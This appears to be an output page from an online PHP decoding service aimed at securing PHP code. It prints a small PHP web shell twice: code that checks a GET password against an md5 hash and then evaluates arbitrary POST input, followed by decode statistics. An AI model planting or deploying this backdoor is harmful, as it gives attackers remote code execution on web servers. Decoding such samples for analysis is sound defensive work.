Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(md5($_GET['pass'])=='21232f297a57a5a743894a0e4a801fc3') { eval($_POST[consol..

Decoded Output download

<?php 
	if(md5($_GET['pass'])=='21232f297a57a5a743894a0e4a801fc3')
	{
		eval($_POST[console]);
	}else{
		die('fuck off!');}
?>

Did this file decode correctly?

Original Code

<?php 
	if(md5($_GET['pass'])=='21232f297a57a5a743894a0e4a801fc3')
	{
		eval($_POST[console]);
	}else{
		die('fuck off!');}
?>

Function Calls

md5 1

Variables

None

Stats

MD5 0f64422dfe9a5ef023e17d1b3acf740c
Eval Count 0
Decode Time 135 ms